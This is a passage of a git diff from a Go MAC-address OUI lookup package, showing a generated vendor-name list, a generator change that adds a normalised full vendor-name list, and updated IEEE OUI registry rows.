Company", + "Vocal Data, Inc.", + "Vlsi Technology Inc.", + "Rsr S.r.l.", + "Xitron Technologies, Inc.", + "Spx-Ateg", + "Elteco A.s.", + "Multitel", + "Stratabeam Technology, Inc.", + "Chase Communications", + "Thales e-Security Ltd.", + "Lightera Networks, Inc.", + "Voxent Systems Ltd.", + "Ardent Technologies, Inc.", + "O2 Micro, Inc.", + "Trendview Recorders Ltd.", + "KATHREIN TechnoTrend GmbH", + "Intelliworxx, Inc.", + "Oskar Vierling Gmbh + Co. Kg", + "Bank of America", + "Gemflex Networks, Ltd.", + "Kestrel Solutions", + "Anda Networks", + "Salix Technologies, Inc.", + "Navic Systems, Inc.", + "Iwill Corporation", + "Cbl - Gmbh", + "1394 Printer Working Group", + "Murata Machinery, Ltd.", + "Maple Computer Corporation", + "Arbor Networks Inc", + "Data & Control Equipment Ltd.", + "Omnia Communications, Inc.", + "Willowbrook Technologies", + "Aplio", + "Vanlink Communication Technology Research Institute", + "Io Tech, Inc.", + "TransMedia Communications, Inc.", + "Tundo Corporation", + "Voiceboard Corporation", + "Digianswer A/S", + "Accel, Inc.", + "Datong Electronics Ltd.", + "Terasaki Electric Co., Ltd.", + "Rsi Systems", + "Ns Tech Electronics Sdn Bhd", + "Signum Systems Corp.", + "Merlot Communications", + "Satori Electoric Co., Ltd.", + "Cosystems, Inc.", + "Nortel", + "Sbc Designs, Inc.", + "ens, inc.", + "Assured Digital, Inc.", + "Digitalcast, Inc.", + "ECCS, Inc.", + "Ultimate Technology Corp.", + "Advanced Switching Communications, Inc.", + "GIESECKE & DEVRIENT GmbH", + "WalkAbout Computers, Inc.", + "BAE Systems Australia (Electronic Systems) Pty Ltd", + "Epigram, Inc.", + "Atech System", + "Turnstone Systems, Inc.", + "Itis", + "Mysticom, Ltd.", + "MIHARU COMMUNICATIONS Inc", + "Nippon Signal Co., Ltd.", + "Lake Communications", + "DPAC Technologies", + "Pec (Nz) Ltd.", + "Vetronix Corp.", + "Teleste Corporation", + "Communication Devices, Inc.", + "Simrad As", + "Overland Storage Inc.", + "Innovaphone Ag", + "Allgon Ab", + "Rotork Instruments, Ltd.", + "Spec S.a.", + "CopperCom, Inc.", + "Shasta Networks", + "DigitalScape, Inc.", + "Vickers Electronics Systems", + "Adhoc Technologies", + "TeraLogic, Inc.", + "Nagoya Electric Works Co., Ltd", + "Exelis", + "Htrc Automation, Inc.", + "WinNet Metropolitan Communications Systems, Inc.", + "Polaris Communications, Inc.", + "Ito Co., Ltd.", + "Thales Contact Solutions Ltd.", + "Trenton Technology Inc.", + "GNP Computers", + "InnoLabs Corporation", + "Nortel Networks Broadband Access", + "I Controls, Inc.", + "Artel Video Systems", + "Ibm Japan, Fujisawa Mt+D", + "Ic Ensemble, Inc.", + "SIRONA DENTAL SYSTEMS GmbH & Co. KG", + "Storage Computer Corporation", + "Cardkey Systems, Inc.", + "Applied Resources, Inc.", + "Ibc/Integrated Business Computers", + "Troika Networks, Inc.", + "Nitto Tsushinki Co., Ltd", + "Performance Analysis Broadband, Spirent plc", + "Rion Co., Ltd.", + "Volamp, Ltd.", + "Coactive Aesthetics", + "Kendin Semiconductor, Inc.", + "Zodiac Data Systems", + "Netschools Corporation", + "Facit K.k.", + "P-Com, Inc.", + "The Telecommunication Technology Committee (Ttc)", + "Micro Research Ltd.", + "Reliance Computer Corp.", + "Top Layer Networks, Inc.", + "Digital Microwave Corporation", + "Hippi Networking Forum", + "WebSonic", + "Vienna Systems Corporation", + "Tadiran Com. Ltd.", + "Netline", + "Telsis Limited", + "Abler Technology, Inc.", + "Crossroads Systems, Inc.", + "Computer & Communication Research Lab.", + "Cosworth Electronics Ltd", + "Jato Technologies, Inc.", + "Ees Technology, Ltd.", + "Osai Srl", + "Misys Financial Systems, Ltd.", + "Seiwa Electric Mfg. Co., Ltd.", + "Dux, Inc.", + "Lsics Corporation", + "Best Data Products", + "Ipc Information Systems, Inc.", + "Carrier Access Corporation", + "Dh Technology", + "Ingenieria Electronica Comercial Inelcom S.a.", + "Pacom Systems Ltd.", + "Digicom Systems, Incorporated", + "JUMP INDUSTRIELLE COMPUTERTECHNIK GmbH", + "Tiernan Communications, Inc.", + "Tazmo Co., Ltd.", + "Ackfin Networks", + "Epis Microcomputer", + "ProMax Systems, Inc.", + "Techno Scope Co., Ltd.", + "IntraServer Technology, Inc.", + "Ecole Polytechnique Federale De Lausanne (Epfl)", + "WaveAccess, Ltd.", + "WaveSpan Corporation", + "Hagiwara Sys-Com Co., Ltd.", + "Sentient Networks Inc.", + "Davicom Semiconductor, Inc.", + "Amati Communications Corp.", + "Sherwood", + "BERGHOF AUTOMATIONSTECHNIK GmbH", + "Freegate Corp.", + "West End Systems Corp.", + "Host Engineering", + "Strand Lighting Limited", + "LANBit Computer, Inc.", + "AVIDIA Systems, Inc.", + "Netspeed, Inc.", + "Redcreek Communications, Inc.", + "NetICs, Inc.", + "Packeteer, Inc.", + "Arn", + "e-Net, Inc.", + "Raytheon E-Systems, Inc.", + "National Amusement Network, Inc.", + "Kapsch Ag", + "AdvanSys", + "Gadzoox Networks", + "Hrk Systems", + "Ricardo Test Automation Ltd.", + "Power Computing Corporation", + "Mmc Networks, Inc.", + "Myricom, Inc.", + "ADVANCED COMPUTER SOLUTIONS, Inc.", + "Data Innovations North America", + "Datafusion Systems", + "Pivotal Networking, Inc.", + "Nera Networks AS", + "Wavenet International, Inc.", + "Switched Network Technologies, Inc.", + "Tokimec Inc.", + "VIKING Modular Solutions", + "Technical Communications Corp.", + "Teraoka Weigh System Pte, Ltd.", + "Accu-Time Systems, Inc.", + "Hitachi Zosen Corporation", + "Kuka Welding Systems & Robots", + "Pericom Semiconductor Corp.", + "Psion Dacom Plc.", + "Dallas Semiconductor, Inc.", + "Acres Gaming, Inc.", + "Copper Mountain Communications, Inc.", + "Dvs Gmbh", + "LACROIX Trafic", + "Prisa Networks", + "Celcore, Inc.", + "Continuum Technology Corp.", + "3Cx", + "Vmetro, Inc.", + "INTEGRATED SYSTEMS Technology, Inc.", + "Trancell Systems", + "Nascent Networks Corporation", + "Nihon Kohden America", + "Wireless Data Group Motorola", + "BTG Electronics Design BV", + "DR. JOHANNES HEIDENHAIN GmbH", + "1394 Trade Association", + "Tonyang Nylon Co., Ltd.", + "Nisshin Electric Co., Ltd.", + "Cylink Corporation", + "Computer Society Microprocessor & Microprocessor Standards C", + "Opto-22", + "Teldat, S.a.", + "Applied Creative Technology, Inc.", + "Desknet Systems, Inc.", + "Lite-On Communications, Inc.", + "Cordant, Inc.", + "Micropross", + "Westport Research Associates, Inc.", + "Citadel Computer", + "Varian", + "Xpoint Technologies, Inc.", + "Apexx Technology, Inc.", + "Integrated Fitness Corp.", + "Ges Singapore Pte. Ltd.", + "Xkl Systems Corp.", + "Csir", + "Wyle", + "Coastcom", + "Megatron Computer Industries Pty, Ltd.", + "Northern Telecom/Network", + "Pulse Electronics, Inc.", + "Flowpoint Corporation", + "Creative Controllers, Inc.", + "Boston Technology, Inc.", + "Encore Networks, Inc.", + "Seeq Technology, Inc.", + "Convex Computer Corporation", + "Japan Digital Laborat'y Co.ltd", + "Cubix Corporation", + "Cyberdata Corporation", + "JAPAN MINICOMPUTER SYSTEMS CO., Ltd.", + "Counter Solutions Ltd.", + "Octel Communications Corp.", + "Steinbrecher Corp.", + "Vipa Gmbh", + "MRV Communications, Inc.", + "Prime Option, Inc.", + "Scorpion Logic, Ltd.", + "Panasonic Technologies, Inc./Mieco-Us", + "Finecom Co., Ltd.", + "Linq Systems", + "Advanced Computer Applications", + "Zeta Communications, Ltd.", + "The 3Do Company", + "Dsp Solutions, Inc.", + "Aehr Test Systems", + "Network Security Systems, Inc.", + "Symmetrical Technologies", + "Genitech Pty Ltd", + "Dovatron", + "Hynet, Ltd.", + "Lan Access Corp.", + "Pronet Gmbh", + "Raynet Corporation", + "Advanced Compression Technology, Inc.", + "Huntsville Microsystems, Inc.", + "Digital Ocean", + "Riva Electronics", + "Juki Corporation", + "White Horse Industrial", + "Invensys", + "Usc Corporation", + "Analog & Digital Systems", + "Interflex Datensysteme Gmbh", + "General Magic, Inc.", + "Bmc Software", + "Carrera Computers, Inc.", + "Okuma Corporation", + "La Francaise Des Jeux", + "Sonic Solutions", + "Scope Communications, Inc.", + "Fonsys Co.,Ltd.", + "Sync Research Inc.", + "Space & Naval Warfare Systems", + "Wm-Data Minfo Ab", + "Studio Gen Inc.", + "Lockheed - Sanders", + "Silex Technology America", + "Areanex Communications, Inc.", + "Computer Operational", + "Netspan Corporation", + "Quinte Network Confidentiality", + "Genius Net Co.", + "Quantum Software Systems Ltd.", + "Uunet Technologies, Inc.", + "Nippon Avionics Co., Ltd.", + "Syntellect, Inc.", + "Kubota Corporation Electronic", + "Socket Communications, Inc.", + "Stores Automated Systems, Inc.", + "Raytech Electronic Corp.", + "Ecci", + "Unigraf Oy", + "Canary Communications, Inc.", + "Interlink Communications Ltd.", + "Tamura Corporation", + "Comtrol Corporation", + "Emcom Corporation", + "Datalux Corp.", + "Intermedium A/S", + "Aspect Software Inc.", + "Telesciences Co Systems, Inc.", + "Cei Systems & Engineering Pte", + "Network Information Technology", + "Sparktrum Microsystems, Inc.", + "Netcor", + "Addtron Technology Co., Ltd.", + "Sma Regelsysteme Gmbh", + "Lanco, Inc.", + "Tera Microsystems, Inc.", + "Oem Engines", + "Optec Daiichi Denko Co., Ltd.", + "Juko Manufacture Company, Ltd.", + "Yoshida Kogyo K. K.", + "Delta Controls, Inc.", + "Katron Computers Inc.", + "Fine-Pal Company Limited", + "EMK Elektronik GmbH & Co. KG", + "Arco Electronic, Control Ltd.", + "Fiberdata Ab", + "Nextcom K.k.", + "Bytex Corporation, Engineering", + "Michels & Kleberhoff Computer", + "Asp Computer Products, Inc.", + "Macq Electronique Sa", + "Goldstar Cable Co., Ltd.", + "Codonics Inc.", + "R.p.t. Intergroups Int'l Ltd.", + "Opcom", + "Future Systems, Inc.", + "Datatech Enterprises Co., Ltd.", + "Alloy Computer Products (Australia) Pty Ltd", + "Micom Communications Inc.", + "CommScope Inc", + "Smd Informatica S.a.", + "Extended Systems", + "Wearnes Automation Pte Ltd", + "Systemhaus Discom", + "Compac Inc.", + "Pagine Corporation", + "Accord Systems, Inc.", + "Emerson Process Management Power & Water Solutions, Inc.", + "Ansel Communications", + "Qume Corporation", + "Qnix Computer Co., Ltd.", + "Harris Adacom Corporation", + "Kendall Square Research Corp.", + "Luxcom, Inc.", + "Cybergraphic Systems Pty Ltd.", + "Dayna Communications, Inc.", + "Ziatech Corporation", + "Shinnihondenko Co., Ltd.", + "Tecnetics (Pty) Ltd.", + "Onelan Ltd.", + "The Cloud Inc.", + "Republic Technology, Inc.", + "Ibr Computer Technik Gmbh", + "Elsag Datamat spa", + "Ncube", + "Embedded Performance Inc.", + "Document Technologies, Inc.", + "Goldstar Co., Ltd.", + "Tachibana Tectron Co., Ltd.", + "Access Co., Ltd.", + "Condor Systems, Inc.", + "Networld, Inc.", + "Allumer Co., Ltd.", + "Commissariat A L`Energie Atom.", + "Ice Corporation", + "Megahertz Corporation", + "Cogent Data Technologies", + "Racore Computer Products Inc.", + "Broadcast Television Systems", + "Videcom Limited", + "Equinox Systems Inc.", + "Fisher Controls", + "Nexus Electronics", + "Alberta Microelectronic Centre", + "Thomson Csf", + "Radstone Technology", + "Bell Atlantic", + "Technically Elite Concepts", + "Canstar", + "Daikin Industries, Ltd.", + "Cactus Computer Inc.", + "Micronics Computer, Inc.", + "Hytec Electronics Ltd.", + "Eaton Industries GmbH", + "Westcoast Technology B.v.", + "Aries Research", + "Seiko Systems, Inc.", + "Liberty Electronics", + "Sun Electronics Corp.", + "Human Designed Systems, Inc.", + "Hottinger Brüel & Kjær A/S", + "Synernetics", + "Gipsi S.a.", + "Alfa Laval Automation Ab", + "Satelcom (Uk) Ltd", + "Wyse Technology Llc", + "H-Three Systems Corporation", + "C. Itoh Electronics, Inc.", + "Intrusion.com, Inc.", + "Soc. De Teleinformatique Rtc", + "Oxford Metrics Limited", + "Youth Keep Enterprise Co Ltd", + "Arix Corporation", + "Adaptec Incorporated", + "Du Pont Pixel Systems .", + "Acer Technologies Corp.", + "Grid Systems", + "Imc Networks Corp.", + "Rechner Zur Kommunikation", + "Fibronics Ltd.", + "Omron Tateisi Electronics Co.", + "Connect As", + "Kti", + "Ramtek Corp.", + "Soft * Rite, Inc.", + "Siig, Inc.", + "Sanyo Electric Co. Ltd.", + "Vitalink Communications Corp.", + "Tandem Computers", + "Tomen Electronics Corp.", + "Elxsi", + "Veritas Software", + "Aes Data Inc.", + "Trw - Sedd/Inp", + "Autotote Limited", + "Gandalf Data Limited", + "Rnd-Rad Network Devices", + "Bell & Howell Pub Sys Div", + "Quotron Systems Inc.", + "Canberra Industries, Inc.", + "Abekas Video System", + "Racal-Milgo Information Sys..", + "Microfive Corporation", + "Tigan Incorporated", + "Tsl Communications Ltd.", + "Casio Computer Co. Ltd.", + "Masscomp", + "Middle East Tech. University", + "Hydra Computer Systems Inc.", + "Sequent Computer Systems Inc.", + "Banyan Systems Inc.", + "David Systems Inc.", + "Ridge Computers", + "Plessey", + "Industrial Networking Inc.", + "Stanford Telecomm. Inc.", + "PerfTech, Inc.", + "Simpact", + "Stc Business Systems", + "MACNICA, Inc.", + "Agfa Corporation", + "Xyvision Inc.", + "Fred Koschara Enterprises", + "3M Company", + "E&B Telecom", + "Gen IV Technology LLC", + "Nebula Electronic Technology Corporation", + "Bird Home Automation GmbH", + "Hangzhou ChengFengErLai Digial Technology Co.,Ltd.", + "Wingtech Group (HongKong) Limited", + "N3com", + "Alif Semiconductor, Inc.", + "Habolink Technology Co.,LTD", + "Anhui Saida Technology Limited Liability Company", + "Loongson Technology Corporation Limited", + "CTS System Co., LTD.", + "Aidin Robotics", + "Nexapp Technologies Pvt Ltd", + "Laiier", + "Versuni", + "Wuhan Maiwe communication Co.,Ltd", + "Candid Optronix Private Limited", + "Sage Technologies Inc.", + "Zhongshan Zhiniu Electronics Co.,Ltd.", + "Mara Tech LLC", + "Daikin Holdings Singapore Pte Ltd", + "Came Uk", + "IndiNatus (IndiNatus India Private Limited)", + "H1-Radio co.,ltd", + "Mitsubishi Electric Automation (China) Ltd.", + "Jiangsu Best Tone Information Service Co., Ltd", + "Woven By Toyota U.S., Inc.", + "Bigleaf Networks Inc.", + "Domus NTW CORP.", + "MG Co., Ltd.", + "Avutec", + "Steplock Access AB", + "SynaXG Technologies Pte. Ltd.", + "Meteocontrol GmbH", + "Lumentum", + "Med-Eng Holdings ULC", + "Telink Semiconductor(Shanghai) Co.,Ltd", + "Robotic d.o.o.", + "HD Hyundai Electric", + "Hangzhou Hylin IoT Techonology Co.,Ltd.", + "Mobotix AG", + "PHC Corporation", + "Monthly Kitchen", + "Fortune Marketing Private Limited", + "Donaldson Company", + "Elproma Elektronika Sp Z O O", + "Shenzhen Vatilon Electronics Co.,Ltd", + "tickIoT Inc.", + "OpenWrt", + "Data Controls Inc.", + "Groupe SEB", + "AxyomCore Inc.", + "Merlion Consulting Services (Shenzhen) Co., Ltd", + "TTTech Auto AG", + "Senaisc", + "ICC Intelligent Platforms GmbH", + "Aivres SYSTEMS INC", + "NEXCON Technology Co.,ltd.", + "Epiq Solutions", + "DRD Automation GmbH", + "Hanwha Vision VietNam", + "Shenzhen Cloudsky Technologies Co., Ltd.", + "Angel Robotics", + "Chengdu Geeker Technology Co., Ltd.", + "Integrated Engineering BV", + "Nanjing Simon Info Tech Co.,Ltd.", + "Unis Flash Memory Technology(Chengdu)Co.,Ltd.", + "ShieldSOS LLC", + "FiSens GmbH", + "Pulse Eight Limited", + "Shenzhen SiACRRIER Industry Machines Co.,LTD", + "Beijing Global Safety Technology Co., LTD.", + "Mechatronics Innovation Technologies, S.l.u.", + "BSH Electrical Appliances (Jiangsu) Co., Ltd.", + "Kiwibit Inc.", + "ITLook", + "OPTOWL Co.,Ltd", + "Flipper Devices Inc", + "Enginko Srl", + "Third Reality, Inc", + "IGEN Tech Co., Ltd.", + "Dx Antenna Co.,Ltd.", + "HongKong YiTong Technology Ltd.", + "NovaTech, LLC", + "Micronet union Technology (chengdu) co., Ltd", + "Cortex Security Inc", + "Guangdong NanGuang Photo & Video Systems Co., Ltd", + "Holowits Technologies Co.,Ltd", + "TOPDON TECHNOLOGY Co.,Ltd.", + "imperix Ltd", + "Elmec Elettronica SRL", + "BKS GmbH", + "Pt. Bizlink Technology Indonesia", + "Beijing Zhongyuan Yishang Technology Co.,LTD", + "Maxtek Optoelectronics Ltd", + "Shenzhen Orfa Tech Co.,Ltd", + "Cdoubles Electronics Co. Ltd.", + "Aginode Germany GmbH", + "WavTek Technologies, Inc", + "Science Corporation", + "Wistron Service(Kunshan) Co., Ltd.", + "Enfabrica", + "GopherTec Inc.", + "Mobititecabsolut S.a.", + "TPV Audio and Visual Technology (Shenzhen) Co.,Ltd.", + "ShenZhen XinZhongXin Technology Co., Ltd", + "General Motors", + "Vantiva Connected Home - Home Networks", + "Topssd", + "Adopt Nettech Pvt Ltd", + "Kogniza Inc.", + "Shanghai Baosight Software Co., Ltd", + "Xconnect", + "MangoBoost Inc", + "Kubota Corporation", + "Xovis Germany GmbH", + "Yucca Technology Company Limited.", + "GO development GmbH", + "Shanghai Xiangcheng Communication Technology Co., Ltd", + "Sichuan Huakun Zhenyu Intelligent Technology Co.,Ltd", + "ShenZhen Microtest Automation Co.,Ltd", + "Taiwan Shin Kong Security Co., Ltd", + "Logically Us Ltd", + "KO & AL Co., Ltd", + "fünfeinhalb Funksysteme GmbH", + "Velorum B.V", + "ELKA - Torantriebe GmbH u. Co. Betriebs KG", + "INGCHIPS Technology Co., Ltd", + "Annapurna labs", + "PATEO CONNECT (Xiamen) Co., Ltd.", + "Guangdong COROS Sports Technology Co.,Ltd", + "AIstone Global Limited", + "Công ty Cổ phần Thiết bị Công nghiệp GEIC", + "Documentation", + "IPv6 Multicast", + "MPLS TP p2p", + "AllL2MI ISs", + "PacketPWEthA", + "TRILL OAM", + "BFD on LAG Interfaces", + "BFD for VXLAN", + "AllL1MI ISs", + "IPv4 Multicast", + "Proxy Mobile IPv6", + "PacketPWEthB", } diff --git a/oui/magefiles/gen.go b/oui/magefiles/gen.go index 77e6d7b..89181d9 100644 --- a/oui/magefiles/gen.go +++ b/oui/magefiles/gen.go @@ -37,6 +37,12 @@ var vendors = []string{ {{- end }} } +var vendorsFull = []string{ +{{- range .VendorsFull }} +"{{ . }}", +{{- end }} +} + ` var caser = cases.Title(language.English) @@ -150,8 +156,9 @@ var terms = []string{ var pattern = regexp.MustCompile(`(?i)\b(?:` + strings.Join(terms, "|") + `)`) type templateData struct { - Entries []entry - Vendors []string + Entries []entry + Vendors []string + VendorsFull []string } type OUI string @@ -287,8 +294,9 @@ func generate(src, dst string) error { func newTemplateData(r io.Reader) *templateData { var ( - entries []entry - vendors []string + entries []entry + vendors []string + vendorsFull []string ) ouiMap := make(map[string]string) @@ -315,6 +323,11 @@ func newTemplateData(r io.Reader) *templateData { o := strings.ToLower(record[1]) v := strings.TrimSpace(record[2]) + vf := strings.Join(strings.Fields(v), " ") + vf = strings.ReplaceAll(vf, `"`, "") + if IsUpper(v) { + vf = caser.String(vf) + } v = pattern.ReplaceAllString(v, "") v = sr.Replace(v) v = strings.Join(strings.Fields(v), " ") @@ -332,6 +345,7 @@ func newTemplateData(r io.Reader) *templateData { if _, ok := vendorMap[v]; !ok { vendors = append(vendors, v) + vendorsFull = append(vendorsFull, vf) vendorMap[v] = id id++ } @@ -346,6 +360,7 @@ func newTemplateData(r io.Reader) *templateData { ouiMap[k] = v if _, ok := vendorMap[v]; !ok { vendors = append(vendors, v) + vendorsFull = append(vendorsFull, v) vendorMap[v] = id id++ } @@ -357,7 +372,8 @@ func newTemplateData(r io.Reader) *templateData { }) return &templateData{ - Entries: entries, - Vendors: vendors, + Entries: entries, + Vendors: vendors, + VendorsFull: vendorsFull, } } diff --git a/oui/oui.csv b/oui/oui.csv index 9f50f99..69faf9d 100644 --- a/oui/oui.csv +++ b/oui/oui.csv @@ -7449,14 +7449,14 @@ MA-L,7824BE,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 MA-L,089707,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 MA-L,A401DE,SERCOMM PHILIPPINES INC,"Lot 1 & 5, Phase 1, Filinvest Technology Park 1, Brgy. Punta, Calamba City Calamba PH Lot 1 " MA-L,68F44B,Home Control Singapore Pte Ltd,"1 Paya Lebar Link, PLQ 1, #04-01(Office 448) Singapore SG 408533 " -MA-L,0C8DDB,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 -MA-L,CC03D9,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 +MA-L,A8ED71,Analogue Enterprises Limited,"2-6 Foo Ming Street, 2J Po Ming Building Causeway Bay HK 999077 " MA-L,10D657,"Siemens Industrial Automation Products Ltd., Chengdu","Tianyuan Road No.99, High Tech Zone West Chengdu Sichuan Province CN 611731 " MA-L,88C78F,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " -MA-L,A8ED71,Analogue Enterprises Limited,"2-6 Foo Ming Street, 2J Po Ming Building Causeway Bay HK 999077 " +MA-L,48C381,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 MA-L,0C1C31,"MERCUSYS TECHNOLOGIES CO., LTD.","3F,Zone B,Building R1,High-Tech Industrial Village,No.023 High-Tech South 4 Road,Nanshan,Shenzhen Shenzhen Guangdong CN 518057 " MA-L,30C91B,"Zhen Shi Information Technology(Shanghai)Co.,Ltd.","5F, Building 3?No. 401 Caobao Road, Xuhui District, Shanghai, ChinaShanghai Shanghai CN 200233 " -MA-L,48C381,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 +MA-L,0C8DDB,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 +MA-L,CC03D9,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,F040EC,RainX PTE. LTD.,83B Tanjong Pagar Road Singapore SG 088504 MA-L,C877F3,VusionGroup,Kalsdorfer Straße 12 Fernitz-Mellach Steiermark AT 8072 MA-L,4024D2,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone Dongguan Guangdong CN 523808 " @@ -7465,20 +7465,18 @@ MA-L,3C7787,"Huawei Device Co., Ltd.","No.2 of Xincheng Road, Songshan Lake Zone MA-L,8C4E46,"Motorola Mobility LLC, a Lenovo Company",222 West Merchandise Mart Plaza Chicago IL US 60654 MA-L,A8469D,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 MA-L,6CDEA9,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 -MA-L,D424DD,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,BC2EC3,"Shenzhen Tianruixiang Communication Equipment Co.,Ltd","12/F, Building B,Longhua Digital Innovation Center, Longhua District, Shenzhen,China. Shenzhen Guangdong CN 518000 " MA-L,3870F2,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,C4BB03,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,246078,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,989BCB,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,BC2EC3,"Shenzhen Tianruixiang Communication Equipment Co.,Ltd","12/F, Building B,Longhua Digital Innovation Center, Longhua District, Shenzhen,China. Shenzhen Guangdong CN 518000 " MA-L,D012CB,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,D424DD,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,089BF1,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,303422,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,9C57BC,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,989BCB,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,8470D7,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,787689,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,28EC22,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,C8C6FE,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,089BF1,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,303422,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,605F8D,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,6CAEF6,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,7CFE90,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " @@ -7498,14 +7496,15 @@ MA-L,DC7CF7,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xiche MA-L,2C5683,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,1C4176,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,94FF61,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,140808,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,28EC22,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,C8C6FE,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,30292B,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,140808,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,8CE4DB,"Shenzhen MiaoMing Intelligent Technology Co.,Ltd","3F, Building 2, No. 1310, Kukeng Sightseeing Road, Kukeng Community, Guanlan Street, Longhua District Shenzhen Guangdong CN 518110 " +MA-L,302450,"Hangzhou Huacheng Network Technology Co.,Ltd","13th Floor, Building 3, No. 582, Liye Road, Changhe Street, Binjiang District, Hangzhou, China (Zhejiang) Pilot Free Trade Zone Hangzhou CN 311200 " MA-L,3409C9,"Dongguan Huayin Electronic Technology Co., Ltd.","Room 101, No.8 Xinglong 3rd Road, Shipai Town Dongguan Guangdong CN 523000 " MA-L,70856C,"Ruijie Networks Co.,LTD","Building 19,Juyuanzhou Industrial Park, No.618 Jinshan Avenue, Cangshan District Fuzhou CN 35000 " MA-L,BC9D37,Telink Micro LLC,2975 Scott Blvd #120 Santa Clara US 95054 -MA-L,8CE4DB,"Shenzhen MiaoMing Intelligent Technology Co.,Ltd","3F, Building 2, No. 1310, Kukeng Sightseeing Road, Kukeng Community, Guanlan Street, Longhua District Shenzhen Guangdong CN 518110 " -MA-L,302450,"Hangzhou Huacheng Network Technology Co.,Ltd","13th Floor, Building 3, No. 582, Liye Road, Changhe Street, Binjiang District, Hangzhou, China (Zhejiang) Pilot Free Trade Zone Hangzhou CN 311200 " -MA-L,948E6D,"Nintendo Co.,Ltd","11-1 HOKOTATE-CHO KAMITOBA,MINAMI-KU KYOTO KYOTO JP 601-8501 " MA-L,0C2779,"New H3C Technologies Co., Ltd","466 Changhe Road, Binjiang District Hangzhou Zhejiang CN 310052 " MA-L,8C5823,"SZ DJI TECHNOLOGY CO.,LTD","DJI Sky City, No55 Xianyuan Road, Nanshan District Shenzhen Guangdong CN 518057 " MA-L,C43396,"Dongguan Hele Electronics Co., Ltd.","Room101, Block1, No.38, DaojiaoDahouRoad, DaojiaoTown, Dongguan City GuangdongProvince CN 523000 " @@ -7517,6 +7516,7 @@ MA-L,B87029,"Shenzhen Ruiyuanchuangxin Technology Co.,Ltd.","Unit 512, 5th Floor MA-L,28CE15,"Shenzhen Xinwei Intelligent Co., Ltd","Building A, Xinwangda Industrial Park, No. 18, Tangjia South Road, Gongming District Shen zhen Guangdong CN 518107 " MA-L,849459,"Hangzhou Hikvision Digital Technology Co.,Ltd.",No.555 Qianmo Road Hangzhou Zhejiang CN 310052 MA-L,9451DC,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,948E6D,"Nintendo Co.,Ltd","11-1 HOKOTATE-CHO KAMITOBA,MINAMI-KU KYOTO KYOTO JP 601-8501 " MA-L,C8088B,Arista Networks,5453 Great America Parkway Santa Clara CA US 95054 MA-L,10D9A2,"Google, Inc.",1600 Amphitheatre Parkway Mountain View CA US 94043 MA-L,E04934,Calix Inc.,2777 Orchard Pkwy San Jose CA US 95131 @@ -7525,16 +7525,15 @@ MA-L,000A49,F5 Inc.,401 Elliott Ave. W. Seattle WA US 98119 MA-L,14A9D0,F5 Inc.,801 5th Avenue Seattle WA US 98104 MA-L,0001D7,F5 Inc.,1322 N. Whitman Lane Liberty Lake WA US 99019 MA-L,78CEA5,Vital link vietnam company limited,"Factory RBF.C1, Lot E1, Thuan Thanh III Industrial Park, Zone B, Gia Dong Ward, Thuan Thanh Town Bac Ninh VN 16000 " -MA-L,CCBABD,TP-Link Systems Inc.,10 Mauchly Irvine CA US 92618 -MA-L,5CE753,Private, +MA-L,58E6C5,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " MA-L,B45B86,"Funshion Online Technologies Co.,Ltd","2101, Floor 